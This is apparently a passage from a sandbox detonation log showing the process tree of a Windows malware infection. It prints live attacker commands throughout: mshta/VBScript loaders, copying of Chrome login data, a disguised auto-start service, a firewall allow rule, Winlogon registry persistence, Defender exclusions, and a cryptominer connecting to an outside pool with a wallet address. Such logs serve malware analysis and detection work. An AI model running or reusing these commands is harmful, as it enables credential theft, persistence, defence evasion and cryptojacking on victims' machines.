        "C:\Users\Admin\Pictures\Adobe Films\ZLYf8yS_xaDseRbVhQl_b5ob.exe"
        8⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\ZLYf8yS_xaDseRbVhQl_b5ob.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\ZLYf8yS_xaDseRbVhQl_b5ob.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        9⤵
        
        PID:6652
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\ZLYf8yS_xaDseRbVhQl_b5ob.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\ZLYf8yS_xaDseRbVhQl_b5ob.exe" ) do taskkill -f -iM "%~NxM"
        10⤵
        
        PID:6668
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "ZLYf8yS_xaDseRbVhQl_b5ob.exe"
        11⤵
        Kills process with taskkill
        
        PID:5544
      - C:\Users\Admin\Pictures\Adobe Films\y6u9_xenEIV1_LxI9LjpznAP.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\y6u9_xenEIV1_LxI9LjpznAP.exe"
        6⤵
        
        PID:5292
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im y6u9_xenEIV1_LxI9LjpznAP.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\y6u9_xenEIV1_LxI9LjpznAP.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:2760
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im y6u9_xenEIV1_LxI9LjpznAP.exe /f
        8⤵
        Kills process with taskkill
        
        PID:6884
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:1984
      - C:\Users\Admin\Pictures\Adobe Films\tp7svny7yJXpuucI536CO03_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\tp7svny7yJXpuucI536CO03_.exe"
        6⤵
        
        PID:4760
      - C:\Users\Admin\Pictures\Adobe Films\UGWdXmLeOR5E8HeaMGwEzhXX.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\UGWdXmLeOR5E8HeaMGwEzhXX.exe"
        6⤵
        
        PID:5296
        
        C:\Users\Admin\Pictures\Adobe Films\UGWdXmLeOR5E8HeaMGwEzhXX.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\UGWdXmLeOR5E8HeaMGwEzhXX.exe"
        7⤵
        
        PID:5716
      - C:\Users\Admin\Pictures\Adobe Films\tYwJi6uiA8Bmj_qA9Z_jNFHw.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\tYwJi6uiA8Bmj_qA9Z_jNFHw.exe"
        6⤵
        
        PID:4776
      - C:\Users\Admin\Pictures\Adobe Films\TxvBfVrqPAW_mxvTjdZGCSpM.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\TxvBfVrqPAW_mxvTjdZGCSpM.exe"
        6⤵
        
        PID:708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue203dd57461.exe
      4⤵
      PID:2864
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue203dd57461.exe
        
        Tue203dd57461.exe
        5⤵
        Executes dropped EXE
        
        PID:1280
      - C:\Users\Admin\AppData\Roaming\8889070.exe
        
        "C:\Users\Admin\AppData\Roaming\8889070.exe"
        6⤵
        
        PID:5068
      - C:\Users\Admin\AppData\Roaming\3459705.exe
        
        "C:\Users\Admin\AppData\Roaming\3459705.exe"
        6⤵
        Checks BIOS information in registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:824
      - C:\Users\Admin\AppData\Roaming\2930514.exe
        
        "C:\Users\Admin\AppData\Roaming\2930514.exe"
        6⤵
        
        PID:4388
      - C:\Users\Admin\AppData\Roaming\6352289.exe
        
        "C:\Users\Admin\AppData\Roaming\6352289.exe"
        6⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:5668
      - C:\Users\Admin\AppData\Roaming\2842163.exe
        
        "C:\Users\Admin\AppData\Roaming\2842163.exe"
        6⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\2842163.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\2842163.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        7⤵
        
        PID:732
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\2842163.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\2842163.exe" ) do taskkill -f -Im "%~NXZ"
        8⤵
        
        PID:6148
        
        C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe
        
        ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i
        9⤵
        
        PID:6432
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        10⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"
        11⤵
        
        PID:7204
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )
        10⤵
        
        PID:7252
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *
        11⤵
        
        PID:8124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EChO "
        12⤵
        
        PID:8188
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"
        12⤵
        
        PID:7424
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\WfNRfms4.K
        12⤵
        
        PID:7572
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K
        13⤵
        
        PID:2684
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K
        14⤵
        
        PID:8880
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K
        15⤵
        
        PID:8932
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -Im "2842163.exe"
        9⤵
        Kills process with taskkill
        
        PID:6540
      - C:\Users\Admin\AppData\Roaming\2099837.exe
        
        "C:\Users\Admin\AppData\Roaming\2099837.exe"
        6⤵
        
        PID:5464
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue2082ea84bd.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3556
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue2082ea84bd.exe
        
        Tue2082ea84bd.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1184
      - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue2082ea84bd.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue2082ea84bd.exe
        6⤵
        Executes dropped EXE
        
        PID:4152
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue20c79bfdadc.exe
      4⤵
      PID:3044
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20c79bfdadc.exe
        
        Tue20c79bfdadc.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2676
      - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20c79bfdadc.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20c79bfdadc.exe
        6⤵
        Executes dropped EXE
        
        PID:4160
      - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20c79bfdadc.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20c79bfdadc.exe
        6⤵
        Executes dropped EXE
        
        PID:4560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue205724605816e79.exe
      4⤵
      PID:3788
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue205724605816e79.exe
        
        Tue205724605816e79.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:1900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue2095db5b6bd7.exe
      4⤵
      PID:3968
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue2095db5b6bd7.exe
        
        Tue2095db5b6bd7.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:1192
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:628
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:5544
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 624
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3224

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5260
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5720

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
1⤵
PID:5536
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Pictures\Adobe Films\QgozlsA6oTcjP7jYdXt3JLZm.exe"
  2⤵
  PID:6104
- C:\Windows\SysWOW64\cmd.exe
  /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
  2⤵
  PID:7548
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Executes dropped EXE
    PID:5148
- C:\Program Files\Mozilla Firefox\Firefox.exe
  "C:\Program Files\Mozilla Firefox\Firefox.exe"
  2⤵
  PID:7544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -s BITS
1⤵
PID:5684

C:\Users\Admin\AppData\Local\Temp\4C58.exe
C:\Users\Admin\AppData\Local\Temp\4C58.exe
1⤵
PID:5592
- C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
  "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
  2⤵
  PID:3644

C:\Users\Admin\AppData\Local\Temp\D81E.exe
C:\Users\Admin\AppData\Local\Temp\D81E.exe
1⤵
PID:7428

C:\Program Files (x86)\Huvbxnl\z0exq0neh.exe
"C:\Program Files (x86)\Huvbxnl\z0exq0neh.exe"
1⤵
PID:4924

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3580
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4228

C:\Users\Admin\AppData\Local\Temp\1860.exe
C:\Users\Admin\AppData\Local\Temp\1860.exe
1⤵
PID:6040
- C:\Users\Admin\AppData\Local\Temp\1860.exe
  C:\Users\Admin\AppData\Local\Temp\1860.exe
  2⤵
  PID:5960

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:3584

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2616

C:\Users\Admin\AppData\Local\Temp\5FDA.exe
C:\Users\Admin\AppData\Local\Temp\5FDA.exe
1⤵
PID:8120
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ndqqspkj\
  2⤵
  PID:6600
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fbqqvciz.exe" C:\Windows\SysWOW64\ndqqspkj\
  2⤵
  PID:6200
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create ndqqspkj binPath= "C:\Windows\SysWOW64\ndqqspkj\fbqqvciz.exe /d\"C:\Users\Admin\AppData\Local\Temp\5FDA.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:7480
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description ndqqspkj "wifi internet conection"
  2⤵
  PID:6760
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start ndqqspkj
  2⤵
  PID:6052
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:7372

C:\Users\Admin\AppData\Local\Temp\A158.exe
C:\Users\Admin\AppData\Local\Temp\A158.exe
1⤵
PID:1792

C:\Users\Admin\AppData\Local\Temp\BEE4.exe
C:\Users\Admin\AppData\Local\Temp\BEE4.exe
1⤵
PID:5712

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5228
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:7784

C:\Users\Admin\AppData\Local\Temp\DB66.exe
C:\Users\Admin\AppData\Local\Temp\DB66.exe
1⤵
PID:6004
- C:\Users\Admin\AppData\Local\Temp\DB66.exe
  C:\Users\Admin\AppData\Local\Temp\DB66.exe
  2⤵
  PID:6692

C:\Users\Admin\AppData\Local\Temp\9CA.exe
C:\Users\Admin\AppData\Local\Temp\9CA.exe
1⤵
PID:7732
- C:\Users\Admin\AppData\Local\Temp\9CA.exe
  C:\Users\Admin\AppData\Local\Temp\9CA.exe
  2⤵
  PID:5276

C:\Windows\SysWOW64\ndqqspkj\fbqqvciz.exe
C:\Windows\SysWOW64\ndqqspkj\fbqqvciz.exe /d"C:\Users\Admin\AppData\Local\Temp\5FDA.exe"
1⤵
PID:6064
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:7840
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:6728

C:\Users\Admin\AppData\Roaming\dfdigda
C:\Users\Admin\AppData\Roaming\dfdigda
1⤵
PID:5852
- C:\Users\Admin\AppData\Roaming\dfdigda
  C:\Users\Admin\AppData\Roaming\dfdigda
  2⤵
  PID:5584

C:\Users\Admin\AppData\Roaming\hbdigda
C:\Users\Admin\AppData\Roaming\hbdigda
1⤵
PID:6280

C:\Users\Admin\AppData\Local\Temp\4453.exe
C:\Users\Admin\AppData\Local\Temp\4453.exe
1⤵
PID:4976

C:\Users\Admin\AppData\Local\Temp\5F45.exe
C:\Users\Admin\AppData\Local\Temp\5F45.exe
1⤵
PID:6748

C:\Users\Admin\AppData\Local\Temp\7639.exe
C:\Users\Admin\AppData\Local\Temp\7639.exe
1⤵
PID:6320
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com
  2⤵
  PID:5356

C:\Users\Admin\AppData\Local\Temp\B4BA.exe
C:\Users\Admin\AppData\Local\Temp\B4BA.exe
1⤵
PID:4504
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ipconfig /release
  2⤵
  PID:500
- - C:\Windows\SysWOW64\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /release
    3⤵
    - Gathers network information
    PID:7244
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
  2⤵
  PID:7688
- - C:\Windows\SysWOW64\PING.EXE
    "C:\Windows\system32\PING.EXE" twitter.com
    3⤵
    - Runs ping.exe
    PID:3380
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
  2⤵
  PID:8208
- - C:\Windows\SysWOW64\PING.EXE
    "C:\Windows\system32\PING.EXE" twitter.com
    3⤵
    - Runs ping.exe
    PID:10056

C:\Users\Admin\AppData\Local\Temp\BAF5.exe
C:\Users\Admin\AppData\Local\Temp\BAF5.exe
1⤵
PID:4644
- C:\Users\Admin\AppData\Local\Temp\BAF5.exe
  C:\Users\Admin\AppData\Local\Temp\BAF5.exe
  2⤵
  PID:3604
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\694b6c69-42ef-40b7-8af4-c75f49cb62ef" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:4844
- - C:\Users\Admin\AppData\Local\Temp\BAF5.exe
    "C:\Users\Admin\AppData\Local\Temp\BAF5.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    PID:2288
  - - C:\Users\Admin\AppData\Local\Temp\BAF5.exe
      "C:\Users\Admin\AppData\Local\Temp\BAF5.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:4368
    - - C:\Users\Admin\AppData\Local\03ac75ec-ad90-408f-91bb-14c3b76f084c\build2.exe
        
        "C:\Users\Admin\AppData\Local\03ac75ec-ad90-408f-91bb-14c3b76f084c\build2.exe"
        5⤵
        
        PID:9420
      - C:\Users\Admin\AppData\Local\03ac75ec-ad90-408f-91bb-14c3b76f084c\build2.exe
        
        "C:\Users\Admin\AppData\Local\03ac75ec-ad90-408f-91bb-14c3b76f084c\build2.exe"
        6⤵
        
        PID:10188
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\03ac75ec-ad90-408f-91bb-14c3b76f084c\build2.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:7236
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im build2.exe /f
        8⤵
        Kills process with taskkill
        
        PID:8436

C:\Users\Admin\AppData\Local\Temp\CF49.exe
C:\Users\Admin\AppData\Local\Temp\CF49.exe
1⤵
PID:6512
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"
  2⤵
  PID:4992
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"
    3⤵
    PID:1544
- C:\Users\Admin\AppData\Local\chromedrlver.exe
  "C:\Users\Admin\AppData\Local\chromedrlver.exe"
  2⤵
  PID:1948
- - C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
    3⤵
    PID:9392

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
1⤵
PID:7380

C:\Users\Admin\AppData\Local\Temp\D3DE.exe
C:\Users\Admin\AppData\Local\Temp\D3DE.exe
1⤵
PID:8128

C:\Users\Admin\AppData\Local\Temp\EEBA.exe
C:\Users\Admin\AppData\Local\Temp\EEBA.exe
1⤵
PID:1424
- C:\Users\Admin\AppData\Local\Temp\06b1ad01-224b-48fd-a2ea-96edfb90c139\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\06b1ad01-224b-48fd-a2ea-96edfb90c139\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\06b1ad01-224b-48fd-a2ea-96edfb90c139\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  PID:6416
- - C:\Users\Admin\AppData\Local\Temp\06b1ad01-224b-48fd-a2ea-96edfb90c139\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\06b1ad01-224b-48fd-a2ea-96edfb90c139\AdvancedRun.exe" /SpecialRun 4101d8 6416
    3⤵
    PID:8512
- C:\Users\Admin\AppData\Local\Temp\41882c9d-3cc8-4231-8c94-60659dcbc97d\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\41882c9d-3cc8-4231-8c94-60659dcbc97d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\41882c9d-3cc8-4231-8c94-60659dcbc97d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  PID:2752
- - C:\Users\Admin\AppData\Local\Temp\41882c9d-3cc8-4231-8c94-60659dcbc97d\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\41882c9d-3cc8-4231-8c94-60659dcbc97d\AdvancedRun.exe" /SpecialRun 4101d8 2752
    3⤵
    PID:8584
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\EEBA.exe" -Force
  2⤵
  PID:9148
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\EEBA.exe" -Force
  2⤵
  PID:9140
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\EEBA.exe" -Force
  2⤵
  PID:9008
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
  2⤵
  PID:6560
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
  2⤵
  PID:1412
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\EEBA.exe" -Force
  2⤵
  PID:4868
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"
  2⤵
  PID:8304
- - C:\Users\Admin\AppData\Local\Temp\97e9dd54-2d97-4993-acbe-84aae1195b05\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\97e9dd54-2d97-4993-acbe-84aae1195b05\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\97e9dd54-2d97-4993-acbe-84aae1195b05\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:4324
  - - C:\Users\Admin\AppData\Local\Temp\97e9dd54-2d97-4993-acbe-84aae1195b05\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\97e9dd54-2d97-4993-acbe-84aae1195b05\AdvancedRun.exe" /SpecialRun 4101d8 4324
      4⤵
      PID:8988
- - C:\Users\Admin\AppData\Local\Temp\be7281a3-2c7f-4a23-9a0e-f64ee243d630\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\be7281a3-2c7f-4a23-9a0e-f64ee243d630\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\be7281a3-2c7f-4a23-9a0e-f64ee243d630\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:8140
  - - C:\Users\Admin\AppData\Local\Temp\be7281a3-2c7f-4a23-9a0e-f64ee243d630\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\be7281a3-2c7f-4a23-9a0e-f64ee243d630\AdvancedRun.exe" /SpecialRun 4101d8 8140
      4⤵
      PID:8248
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
    3⤵
    PID:10060
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
    3⤵
    PID:10160
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
    3⤵
    PID:9284
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
    3⤵
    PID:9420
